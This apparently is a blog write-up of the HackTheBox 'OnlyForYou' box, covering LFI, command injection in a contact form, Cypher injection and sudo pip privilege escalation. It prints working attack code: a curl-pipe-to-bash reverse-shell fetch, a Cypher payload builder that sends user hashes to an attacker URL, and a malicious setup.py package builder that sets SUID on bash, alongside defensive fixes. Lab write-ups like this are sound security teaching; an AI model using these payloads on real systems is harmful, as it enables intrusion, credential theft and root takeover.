OnlyForYou (HTB) Writeup, the Saitleop way!

Saitleop
6 min read, May 13, 2023


Wassup guyz, hope you all are alright. After the mind-boggling response to my last blog about hacking APIs, I will try to be more consistent now…..

Here I am with an entirely new concept for CTF writeups. I won't just hand you the commands; I'll tell you how YOU, yes YOU, can avoid needing a writeup at all when you run into the same problem. I'll show how to make a confident guess at the vuln or the exploitation vector, which is crucial for solving CTF challenges.

Now wait, did you say jeopardy? Which Pokemon is it?

So there are various types of CTFs, and jeopardy is one of them: you get a board of independent challenges (web, pwn, crypto, forensics and so on), each worth points, and you solve them to obtain flags. A boot2root box like the ones on HackTheBox is a close cousin, where you pwn the whole machine and collect the user and root flags. There are other types too, like attack-defence, where every team runs the same vulnerable services and has to patch its own while getting into everyone else's.

Let’s beginnn…

So today's box is a writeup for the OnlyForYou box from HackTheBox, which is a place where you can practice your hacking skills. For beginners I'd highly recommend starting with TryHackMe.

Let’s start off, but how???

So in CTFs we usually start off by mapping out the target and gaining some knowledge about what the box exposes.

This can be done with various tools like nmap, autorecon, rustscan etc.

nmap -v -sV -sC -sT -T4 -A -O 10.10.11.210 -oN nmap.txt

For more info on the switches I used, refer to the nmap manual (man nmap, or nmap -h for the short version). In short: -sV detects service versions, -sC runs the default NSE scripts, -sT does a full TCP connect scan, -T4 picks the aggressive timing template (it is a speed setting, not a scan "level"), -A turns on OS detection, version detection, script scanning and traceroute (-O alone is just OS detection), -v is verbose and -oN nmap.txt stores the normal output in nmap.txt.

We see SSH and HTTP ports open, so let's access the webserver.

PORT      STATE    SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e883e0a9fd43df38198aaa35438411ec (RSA)
| 256 83f235229b03860c16cfb3fa9f5acd08 (ECDSA)
|_ 256 445f7aa377690a77789b04e09f11db80 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Only4you
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
32594/tcp filtered unknown
49023/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ooo, we get a weird error: browsing to the IP redirects us to the hostname only4you.htb, which our machine can't resolve, so we need to add the IP and that hostname to our /etc/hosts file.

Now I want you to have Burp Suite loaded, with all traffic passing through the Burp proxy.

Hmm, nothing interesting here, what's next?

Let's try running a directory bruteforce to find sus pages. I'll be using gobuster; you can use whatever you prefer, I recommend trying FFUF.

Nothing interesting here either, uhh….

No worries, let's find some subdomains (virtual hosts).

gobuster vhost -u http://only4you.htb -w /home/saitleop/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain

Note that -u has to be the hostname, not the IP: --append-domain builds candidate Host headers like beta.only4you.htb from whatever you pass in -u, and the server only answers to names.

We do get a subdomain, so let's add it to the /etc/hosts file too (same IP).

On beta.only4you.htb we get the source code of the app, which is very noice: having the source makes the exploitation vector much easier to spot.

Do you see something sus in the source code??

Recall Local File Inclusion (LFI), yeah u got it…

Let's exploit it: go to /list, intercept the download request and put an absolute path, /etc/passwd, in place of the image filename.

We got our LFI, les gooo
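Why an absolute path works even when the app filters "../" is worth seeing in code. The following is an added example of the vulnerable pattern and its fix, not the box's own code: the image directory and the function names are assumptions, but the os.path.join behaviour is exactly what makes this class of download handler fall over.

```python
import os

# Constructed: the directory the app is assumed to serve images from.
IMAGE_DIR = "/srv/only4you/static/img"


def resolve_download_vulnerable(requested: str) -> str:
    """The weak pattern: filter '../' and then os.path.join the raw value.

    os.path.join throws away everything before an absolute component, so
    '/etc/passwd' is returned untouched even though no '../' is present.
    """
    if "../" in requested:
        raise ValueError("traversal attempt blocked")
    return os.path.join(IMAGE_DIR, requested)


def resolve_download_safe(requested: str) -> str:
    """Canonicalise first, then prove the result still lives under IMAGE_DIR."""
    base = os.path.realpath(IMAGE_DIR)
    # realpath collapses '..' and resolves symlinks, so the containment check
    # below sees the path the kernel would actually open.
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"{requested!r} escapes {base}")
    return candidate


def demo() -> dict:
    """Run both resolvers over a benign name, the absolute-path bypass and a
    classic traversal; returns what each call produced or raised."""
    results = {}
    for name in ("pixel.png", "/etc/passwd", "../../../../etc/passwd"):
        for label, fn in (("vuln", resolve_download_vulnerable),
                          ("safe", resolve_download_safe)):
            try:
                results[(label, name)] = fn(name)
            except ValueError as exc:
                results[(label, name)] = f"blocked: {exc}"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The takeaway for the hunt: when you see a denylist on "../" in a download or include handler, try an absolute path next, and when you write one yourself, check containment after canonicalisation rather than pattern-matching the input.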

Now it's time to enumerate some more. Look at the server header: it's nginx, and that narrows our enumeration, because on Ubuntu nginx keeps its vhost configs under /etc/nginx/sites-enabled/, and those configs tell us where on disk each app lives (and which other vhosts exist).

Usually in this situation you fuzz the LFI with a wordlist for juicy files.

I did the same using the LFI wordlist from SecLists with Burp Intruder.

Before that, did we have a look at the contact form on the main site?

There's an RCE here that you'd have completely missed, which tells us to take a look at every feature; do your best before asking for help :)

name=ok&email=sus@ok.com;curl <ip>&subject=idk

The email field ends up in a shell command, so a ; terminates that command and whatever follows runs too. If you open a webserver on your end, you receive a GET request from the box, which confirms RCE.

We won't be able to get a reverse shell by running the one-liner directly in the email field, so why not make a file that does the same?

Save a bash reverse-shell one-liner (pointing at your IP and listener port) in a file named shell and serve it with your webserver.

And in the email field do

curl http://<your ip>/shell | bash

Open a netcat listener for the connection and we receive a shell.
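To make the injection mechanics concrete, here is an added example (mine, not the box's form handler) of the vulnerable pattern next to two fixes. The real app ran a lookup tool on the e-mail's domain; this example substitutes echo for that tool so it is harmless and runs anywhere, and the function names and the regex are my own.

```python
import re
import subprocess

# Stand-in for the real lookup command: the app ran an external tool on the
# e-mail's domain through a shell. `echo` is used here so the demo is harmless
# and runs anywhere; the injection mechanics are identical.
LOOKUP_CMD = "echo lookup"

# Hostname rule: RFC 1123 labels, dotted, with an alphabetic TLD.
DOMAIN_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$",
    re.IGNORECASE,
)


def domain_of(email: str) -> str:
    """Naive split the way a careless handler does it: everything after the last '@'."""
    if "@" not in email:
        raise ValueError("not an e-mail address")
    return email.rsplit("@", 1)[1]


def lookup_vulnerable(email: str) -> str:
    """shell=True with the raw domain: ';' ends the command and starts ours."""
    domain = domain_of(email)
    proc = subprocess.run(f"{LOOKUP_CMD} {domain}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def lookup_no_shell(email: str) -> str:
    """Argument vector, no shell: the metacharacters are just bytes in one argv entry."""
    domain = domain_of(email)
    proc = subprocess.run([*LOOKUP_CMD.split(), domain],
                          capture_output=True, text=True)
    return proc.stdout


def lookup_hardened(email: str) -> str:
    """Validate the domain against an allow-list pattern *and* avoid the shell."""
    domain = domain_of(email)
    if not DOMAIN_RE.match(domain):
        raise ValueError(f"rejected domain: {domain!r}")
    return lookup_no_shell(email)


if __name__ == "__main__":
    payload = "sus@ok.com;echo INJECTED"
    print("vulnerable:", repr(lookup_vulnerable(payload)))
    print("no shell  :", repr(lookup_no_shell(payload)))
    try:
        lookup_hardened(payload)
    except ValueError as exc:
        print("hardened  :", exc)
```

Dropping shell=True alone already stops the ; trick (the whole string becomes a single argument), but the allow-list is what stops the tool itself from being handed something weird, so use both.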

NOICE….

Hmm, nothing sus for horizontal privesc to the user flag, so let's run linpeas.sh.

We don't see much, but we do see other services listening only on localhost.

How do we access them??? Let me introduce you to reverse proxies (well, port forwarding).

A reverse proxy is an application that sits in front of back-end applications and forwards client requests to them. What we need here is that idea turned around: a tunnel that exposes ports bound to the box's loopback interface on our own machine. Let's use FRP (fast reverse proxy); chisel or an SSH -L forward would do the same job.

Use frps (the server) on your end and frpc (the client) on the box, dropped in the /tmp directory.

on your system we run nohup ./frps -p 7000 &

On the client side, transfer the frpc executable and the frpc_ini config (with your IP as server_addr) to the box and run

nohup ./frpc -c frpc_ini &

We get a connection; you can check the nohup.out log file for errors.

Now go to http://127.0.0.1:8001 on your own machine (the forwarded port) and we get an admin panel. Let's try admin:admin.
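For reference, a minimal frpc_ini for this pivot, written by me as an added example and not taken from the box or the FRP project docs: the attacker address is assumed, and the two sections forward the admin panel and the Gogs port we use later.

```ini
[common]
# the attacking machine running frps (assumed address)
server_addr = 10.10.14.5
# must match `frps -p 7000`
server_port = 7000

[admin-panel]
type = tcp
# the service as seen from the box
local_ip = 127.0.0.1
local_port = 8001
# exposed on the frps side, i.e. on your machine
remote_port = 8001

[gogs]
type = tcp
local_ip = 127.0.0.1
local_port = 3000
remote_port = 3000
```

Each [section] is one tunnel; after frpc connects, the box's 127.0.0.1:8001 and 127.0.0.1:3000 are reachable on your machine's 127.0.0.1:8001 and 127.0.0.1:3000.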

we r in, lets gooooo

We see a search box, hmm, our 6th sense smells some injection here. The app uses Neo4j, whose query language is Cypher, so it will be Cypher injection rather than classic SQLi.

Hmm, after scrolling through HackTricks and trying payloads, we get a hit: the LOAD CSV payloads make Neo4j itself request a URL on our webserver with the query results appended as parameters.

On our webserver we get the hashes for user and admin.

Cracking the admin hash gives us

admin:ThisIs4you
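Here is the injection and the exfil side by side, as an added example (not the box's code or the HackTricks page): the node label and property names are assumed, the attacker URL is assumed, and the access-log lines are constructed with fake hashes. The search query is built the injectable way, the parameterised fix is shown beside it, and the last function pulls the leaked pairs back out of the listener's log.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed: your HTTP listener. The node label (:user) and the name/password
# properties used below are assumptions about the schema, not the box's.
ATTACKER = "http://10.10.14.5:8000"


def build_search_query_vulnerable(term: str) -> str:
    """The injectable pattern: the search term is pasted into the Cypher text."""
    return f"MATCH (p:product) WHERE p.name CONTAINS '{term}' RETURN p.name"


def build_search_query_safe(term: str) -> tuple:
    """Parameterised Cypher: the driver sends $term separately, it never becomes syntax."""
    return "MATCH (p:product) WHERE p.name CONTAINS $term RETURN p.name", {"term": term}


def exfil_payload(attacker: str = ATTACKER) -> str:
    """Search term that closes the string, walks every :user node and makes Neo4j
    fetch a URL on our listener carrying name and hash; '//' comments out the
    rest of the original query."""
    return (
        "' OR 1=1 WITH 1 AS _ MATCH (u:user) "
        f"LOAD CSV FROM '{attacker}/?u=' + u.name + '&h=' + u.password AS row "
        "RETURN 0 //"
    )


LOG_RE = re.compile(r'"GET (?P<target>\S+) HTTP/')


def parse_exfil_log(lines) -> dict:
    """Pull (name, hash) pairs out of the listener's access log.

    Works on python -m http.server style lines; every hit is a 404 because the
    path doesn't exist, which is fine, the data is in the query string."""
    found = {}
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m.group("target")).query)
        if "u" in qs and "h" in qs:
            found[qs["u"][0]] = qs["h"][0]
    return found


# Constructed access-log lines (fake hashes, not the box's real ones).
SAMPLE_LOG = [
    '10.10.11.210 - - [13/May/2023 14:02:11] "GET /?u=admin&h=' + "a1" * 32 + ' HTTP/1.1" 404 -',
    '10.10.11.210 - - [13/May/2023 14:02:11] "GET /?u=john&h=' + "b2" * 32 + ' HTTP/1.1" 404 -',
    '10.10.11.210 - - [13/May/2023 14:02:12] "GET /favicon.ico HTTP/1.1" 404 -',
]

if __name__ == "__main__":
    print(build_search_query_vulnerable(exfil_payload()))
    print(parse_exfil_log(SAMPLE_LOG))
```

The 404s in the listener log are expected; the values ride in the query string, so they are logged regardless of the response. On the defensive side the fix is the same as for SQL: parameters, never string concatenation.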

Try SSH as the john user with that password (password reuse!) and we get logged in.

we get the user flag

Now root

sudo -l shows

/usr/bin/pip3 download can be run with sudo, and the argument has to be a URL ending in .tar.gz (served from the local port 3000, as we'll use below).

Binaries with such sudo permissions are what you look for when escalating your privileges: pip download of a source distribution runs the package's setup.py, and here it runs as root.

Some research brings us here…

and to a GitHub repo with the PoC.

Go to the setup.py file and replace this snippet:

Replace the print command by first importing the os module and putting

os.system("chmod u+s /bin/bash")

Now build the package to obtain the .tar.gz (sdist) with

python3 -m build (first install it with pip3 install build)

Now upload the file to a repository on the Gogs instance on port 3000 (forward that port the same way as 8001).

Endgame

Now grab the raw download link of the uploaded file from the Gogs instance and execute

sudo /usr/bin/pip3 download <link>

Next, a simple bash -p and we get the root flag. The SUID bit may get removed by a cron cleanup job, so be fast af.
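A hand-rolled version of the PoC, as an added example that is not the linked repo's code: it builds the sdist directly with tarfile instead of python3 -m build, so you can see exactly what pip will unpack and execute. The package name, version, output directory and helper names are arbitrary choices of mine; the payload command is the same chmod as above.

```python
import io
import tarfile
from pathlib import Path

# setup.py that pip executes while collecting package metadata. The payload
# line runs before setup() is even reached, so a failed build changes nothing.
SETUP_PY_TEMPLATE = """\
import os
from setuptools import setup

os.system({command!r})  # executed by `pip download`, as root under the sudo rule

setup(name={name!r}, version={version!r})
"""


def build_malicious_sdist(out_dir, name="hello", version="0.0.1",
                          command="chmod u+s /bin/bash") -> Path:
    """Write <name>-<version>.tar.gz containing only a setup.py.

    The file name must end in .tar.gz to satisfy the sudo rule's glob, and the
    archive gets the usual <name>-<version>/ top-level directory so pip treats
    it as a source distribution and runs setup.py to read its metadata.
    """
    out_dir = Path(out_dir)
    out_dir.mkdir(parents=True, exist_ok=True)
    archive = out_dir / f"{name}-{version}.tar.gz"
    setup_py = SETUP_PY_TEMPLATE.format(command=command, name=name,
                                        version=version).encode()
    with tarfile.open(archive, "w:gz") as tar:
        info = tarfile.TarInfo(f"{name}-{version}/setup.py")
        info.size = len(setup_py)
        info.mode = 0o644
        tar.addfile(info, io.BytesIO(setup_py))
    return archive


def sdist_members(archive) -> dict:
    """Map member name -> decoded content, to verify what pip will see."""
    with tarfile.open(archive, "r:gz") as tar:
        return {m.name: tar.extractfile(m).read().decode()
                for m in tar.getmembers() if m.isfile()}


if __name__ == "__main__":
    path = build_malicious_sdist(".")
    print(f"built {path}; push it to a Gogs repo and point sudo pip3 download at its raw URL")
```

Nothing in this block touches /bin/bash on the machine it runs on; the chmod only lives inside the generated setup.py, and only fires when pip (here, root via sudo) processes the archive.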

Congrats you solved it!!!!!!!!!!

Conclusion

I chose this box for my first writeup because it mirrors a real-life instance: this is actually how we get to find bugs (just ignore the privesc part). The box maker did a fabulous job making this box.

Bye till then, see you in the next blog, which will be all about starting out as a red teamer.

Peace Outtt!!!!


Saitleop

Intermediate-level hacker interested in red teaming, web app pentesting, web3 and binary exploitation. Do read my first blog, where I have told you everything about me :D